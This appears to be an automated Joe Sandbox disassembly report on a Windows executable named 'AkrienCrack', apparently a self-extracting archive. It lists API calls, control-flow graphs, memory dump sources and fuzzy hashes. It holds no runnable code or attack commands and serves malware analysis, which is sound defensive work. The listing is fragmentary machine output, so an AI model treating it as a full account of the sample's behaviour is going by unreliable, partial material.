              control_flow_graph 1013 b5d287-b5d2b2 call b5e360 SetEnvironmentVariableW call b4fbd8 1017 b5d2b7-b5d2bb 1013->1017 1018 b5d2bd-b5d2c1 1017->1018 1019 b5d2df-b5d2e3 1017->1019 1020 b5d2ca-b5d2d1 call b4fcf1 1018->1020 1023 b5d2c3-b5d2c9 1020->1023 1024 b5d2d3-b5d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1019
              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B5D2D9
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar

              Control-flow Graph

              control_flow_graph 1025 b4984e-b4985a 1026 b49867-b4987e ReadFile 1025->1026 1027 b4985c-b49864 GetStdHandle 1025->1027 1028 b49880-b49889 call b49989 1026->1028 1029 b498da 1026->1029 1027->1026 1033 b498a2-b498a6 1028->1033 1034 b4988b-b49893 1028->1034 1031 b498dd-b498e2 1029->1031 1035 b498b7-b498bb 1033->1035 1036 b498a8-b498b1 GetLastError 1033->1036 1034->1033 1037 b49895 1034->1037 1040 b498d5-b498d8 1035->1040 1041 b498bd-b498c5 1035->1041 1036->1035 1039 b498b3-b498b5 1036->1039 1038 b49896-b498a0 call b4984e 1037->1038 1038->1031 1039->1031 1040->1031 1041->1040 1043 b498c7-b498d0 GetLastError 1041->1043 1043->1040 1045 b498d2-b498d3 1043->1045 1045->1038
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 00B4985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00B49876
              • GetLastError.KERNEL32 ref: 00B498A8
              • GetLastError.KERNEL32 ref: 00B498C7
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B63713,00000000,00000000,?,00B6A49B,00B63713,00000000,00000000,00000000,?,00B6A698,00000006,FlsSetValue), ref: 00B6A526
              • GetLastError.KERNEL32(?,00B6A49B,00B63713,00000000,00000000,00000000,?,00B6A698,00000006,FlsSetValue,00B77348,00B77350,00000000,00000364,?,00B69077), ref: 00B6A532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B6A49B,00B63713,00000000,00000000,00000000,?,00B6A698,00000006,FlsSetValue,00B77348,00B77350,00000000), ref: 00B6A540
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00B4CC94,00000001,?,?,?,00000000,00B54ECD,?,?,?), ref: 00B49F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00B54ECD,?,?,?,?,?,00B54972,?), ref: 00B49F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00B4CC94,00000001,?,?), ref: 00B49FB8
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A261
              • GetLastError.KERNEL32(?,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A27E
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B6B019
              Similarity
              • API ID: Info
              • String ID:
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00B6A79D
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B69D2F), ref: 00B6A715
              Strings
              • InitializeCriticalSectionEx, xrefs: 00B6A6E5
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              APIs
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00B632AF
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5E20B
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID: 3To
              APIs
                • Part of subcall function 00B6AF1B: GetOEMCP.KERNEL32(00000000,?,?,00B6B1A5,?), ref: 00B6AF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B6B1EA,?,00000000), ref: 00B6B3C4
              • GetCPInfo.KERNEL32(00000000,00B6B1EA,?,?,?,00B6B1EA,?,00000000), ref: 00B6B3D7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: 96814b49e7f87b344413ea2b9815d19a1d910b300bee3b38033ab5650d68c795
              • Instruction ID: 9cf9c9f65e8f234febe38c9e1977b1b00baf1c22275ad32b8907aa17a1c8e2ad
              • Opcode Fuzzy Hash: 96814b49e7f87b344413ea2b9815d19a1d910b300bee3b38033ab5650d68c795
              • Instruction Fuzzy Hash: 01511270A002059EDB209F35C891ABABBF5EF55310F1884EED096CB253DB3DD985CB91
              APIs
              • __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B46057: __EH_prolog.LIBCMT ref: 00B4605C
                • Part of subcall function 00B4C827: __EH_prolog.LIBCMT ref: 00B4C82C
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C86F
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C893
              • new.LIBCMT ref: 00B413FE
                • Part of subcall function 00B4B07D: __EH_prolog.LIBCMT ref: 00B4B082
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 64c30a784057183f5de529180dbecfb249c8314745401d151f4571220bf67e17
              • Instruction ID: db870c0f81f7ab0a86e5eb855655cc6d9ab4576cd438738dcde0aacfb9a0c867
              • Opcode Fuzzy Hash: 64c30a784057183f5de529180dbecfb249c8314745401d151f4571220bf67e17
              • Instruction Fuzzy Hash: 4B4129B0805B409EE724DF798485AE7FBE5FF18310F5049AED5EE83282DB326654CB15
              APIs
              • __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B46057: __EH_prolog.LIBCMT ref: 00B4605C
                • Part of subcall function 00B4C827: __EH_prolog.LIBCMT ref: 00B4C82C
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C86F
                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C893
              • new.LIBCMT ref: 00B413FE
                • Part of subcall function 00B4B07D: __EH_prolog.LIBCMT ref: 00B4B082
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: d487501fbac9537c5484a3dc99c7e4b25d88366abbe6c52852f68a2ffee6a8bc
              • Instruction ID: ed2209ca08ae7ff3f9ec62b5223586ef267ec31fa20ebcc368e1281e557f8649
              • Opcode Fuzzy Hash: d487501fbac9537c5484a3dc99c7e4b25d88366abbe6c52852f68a2ffee6a8bc
              • Instruction Fuzzy Hash: 564117B0805B409EE724DF798485AE7FBE5FF18310F504AAED5EE83282DB326654CB15
              APIs
                • Part of subcall function 00B68FA5: GetLastError.KERNEL32(?,00B80EE8,00B63E14,00B80EE8,?,?,00B63713,00000050,?,00B80EE8,00000200), ref: 00B68FA9
                • Part of subcall function 00B68FA5: _free.LIBCMT ref: 00B68FDC
                • Part of subcall function 00B68FA5: SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B6901D
                • Part of subcall function 00B68FA5: _abort.LIBCMT ref: 00B69023
                • Part of subcall function 00B6B2AE: _abort.LIBCMT ref: 00B6B2E0
                • Part of subcall function 00B6B2AE: _free.LIBCMT ref: 00B6B314
                • Part of subcall function 00B6AF1B: GetOEMCP.KERNEL32(00000000,?,?,00B6B1A5,?), ref: 00B6AF46
              • _free.LIBCMT ref: 00B6B200
              • _free.LIBCMT ref: 00B6B236
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: 41738d4ec9a0a780b5cc49e846fb738498cce84942d4b7d22915cd8164bad7f3
              • Instruction ID: 1e823c2b03b492e39e503dedfdfe3a1ddc585daa808ab7dedb37c8d956c2d250
              • Opcode Fuzzy Hash: 41738d4ec9a0a780b5cc49e846fb738498cce84942d4b7d22915cd8164bad7f3
              • Instruction Fuzzy Hash: 6331E431904204AFDB10EFA9C851E6DBBF5EF45320F2541D9E418EB291EF799D81CB50
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B49EDC,?,?,00B47867), ref: 00B497A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B49EDC,?,?,00B47867), ref: 00B497DB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 1c3fe9ce538147d91ae995f29f1b18324282e7e4604bb3ba1e5aacb1c22d81e9
              • Instruction ID: 1577c0e18971ce662b58307b2c8981059e4cfb01ffd1b363f58f0ac78573604e
              • Opcode Fuzzy Hash: 1c3fe9ce538147d91ae995f29f1b18324282e7e4604bb3ba1e5aacb1c22d81e9
              • Instruction Fuzzy Hash: 7C2105B1110748AFE7308F64CC85FA7B7E8EB49764F00496DF5E5821D1C374AE89AB61
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B47547,?,?,?,?), ref: 00B49D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B49E2C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 2a65398bc7d792f4f78e2a861ff5185ebe71f9810595819237d88e0622e26afa
              • Instruction ID: 4556dfcf9c8865d5c16001786f16b1fe077c3c6cfc204c9e4f6b06314b23135a
              • Opcode Fuzzy Hash: 2a65398bc7d792f4f78e2a861ff5185ebe71f9810595819237d88e0622e26afa
              • Instruction Fuzzy Hash: B721D332558246ABC714DF24C891BABBBE4EF96704F0409ACF8D187141D729EB0CEBA1
              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 00B6A4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B6A4C5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: 4525d0d87aca565bdd23f8fdea471f6ed0f6ede557803e7736a68068a510a1c7
              • Instruction ID: 97fb2e2b0d208b3ddf2979bfe3ee5ad05e8b7572e6febfdfbf4fb4952cb08855
              • Opcode Fuzzy Hash: 4525d0d87aca565bdd23f8fdea471f6ed0f6ede557803e7736a68068a510a1c7
              • Instruction Fuzzy Hash: 0411E7336012209B9F259E28EC8495A73D5EF8576071642A0ED29BB344EF78DC41CAD2
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00B49B35,?,?,00000000,?,?,00B48D9C,?), ref: 00B49BC0
              • GetLastError.KERNEL32 ref: 00B49BCD
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 13425b6a755188e1298a42ec6a55c9a44f7a7423b27afa3002baa3ba5dd2a7b7
              • Instruction ID: e184f87978e084ffd46324b2e778945084d436babba8d248de13b722f6c6cc05
              • Opcode Fuzzy Hash: 13425b6a755188e1298a42ec6a55c9a44f7a7423b27afa3002baa3ba5dd2a7b7
              • Instruction Fuzzy Hash: 4001C4313042159F8B08CF65AC9497FB3E9EFC5B21B14466DF91687291CA71DA05BA21
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00B49E76
              • GetLastError.KERNEL32 ref: 00B49E82
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: daa4e020f689c5b381e0e8c522bb00953ef0c1771a2055eca1cfee5a4fc5024e
              • Instruction ID: 65c431152fc8f741f80fd3f64fde50e5d472e279bb19417cb82c6a267d1c0a4e
              • Opcode Fuzzy Hash: daa4e020f689c5b381e0e8c522bb00953ef0c1771a2055eca1cfee5a4fc5024e
              • Instruction Fuzzy Hash: 8801B1713042009BEB34DE29DC88B6BB7D9DB89714F14497EF146C3690DA71EE4CA611
              APIs
              • _free.LIBCMT ref: 00B68627
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00B80F50,00B4CE57,?,?,?,?,?,?), ref: 00B68663
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: 7cca5a35b176dfe44b87df16514acd33f87a68debd3452b73ae9ea295dcd78a6
              • Instruction ID: 112d8d46f678f7e774511921a15f6a2af39230aae95508280307286d4ae5ed02
              • Opcode Fuzzy Hash: 7cca5a35b176dfe44b87df16514acd33f87a68debd3452b73ae9ea295dcd78a6
              • Instruction Fuzzy Hash: E7F0C23210111566DB312A25EC00A6B37D8DF92BA0F248395F858A6191DE7CC80095A5
              APIs
                • Part of subcall function 00B6B610: GetEnvironmentStringsW.KERNEL32 ref: 00B6B619
                • Part of subcall function 00B6B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6B63C
                • Part of subcall function 00B6B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6B662
                • Part of subcall function 00B6B610: _free.LIBCMT ref: 00B6B675
                • Part of subcall function 00B6B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6B684
              • _free.LIBCMT ref: 00B679FD
              • _free.LIBCMT ref: 00B67A04
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
              • String ID:
              • API String ID: 400815659-0
              • Opcode ID: f377185e54bdd003ba04fec196b674a86dfcb748bb4c94651d09f3d73df88761
              • Instruction ID: bbfefd176af1a7e683a88bb8f06dfbbea12ee5dc79a39fa844077cf3593074f3
              • Opcode Fuzzy Hash: f377185e54bdd003ba04fec196b674a86dfcb748bb4c94651d09f3d73df88761
              • Instruction Fuzzy Hash: DAE0ED23A4EA1211A7A2727E6C52A6F06C58F82338F200BDAF424DB1C2CE1C8842019A
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00B50915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B5091C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 2f1ec8abc62d3917638bcdcd63ce3c56fe091088f957026e8451124dd286a15f
              • Instruction ID: c19b7525992684ee040a0de5f3159b429c39e918c5989a19eeeab70b77bf85bc
              • Opcode Fuzzy Hash: 2f1ec8abc62d3917638bcdcd63ce3c56fe091088f957026e8451124dd286a15f
              • Instruction Fuzzy Hash: D8E09B72A20106AB6F05EAA89C046FB73DDEB4431271041F9EC4AD3105F930DD058660
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A489
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 9397eb6c4bc145be7949ab53be0da515ff40fe8274ab1b0ee5027807a90b15df
              • Instruction ID: c6d4b925782a466162ad040528fa2df9e27fcc7411bad3802eeb4ebcb66366bc
              • Opcode Fuzzy Hash: 9397eb6c4bc145be7949ab53be0da515ff40fe8274ab1b0ee5027807a90b15df
              • Instruction Fuzzy Hash: A8F0A03128020D7BDF025F60DC85FD977ACFB04781F048091BC8C87261DB72CAA8BA50
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: af86dc1b5c138f5947356f8531d6de8fa206c87b676b0d19f311446a975ec4ca
              • Instruction ID: 2ebeb0099d4e6bac62d27fc86b0c51b93f5e16493d85187f4b3ef4c6815f0840
              • Opcode Fuzzy Hash: af86dc1b5c138f5947356f8531d6de8fa206c87b676b0d19f311446a975ec4ca
              • Instruction Fuzzy Hash: 22F0EC725003487BDB21AB709C07F9937DCD704746F0406D5BB00631B2DE71AB649761
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,00B4984C,?,?,00B49688,?,?,?,?,00B71FA1,000000FF), ref: 00B4A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00B4984C,?,?,00B49688,?,?,?,?,00B71FA1,000000FF), ref: 00B4A16C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
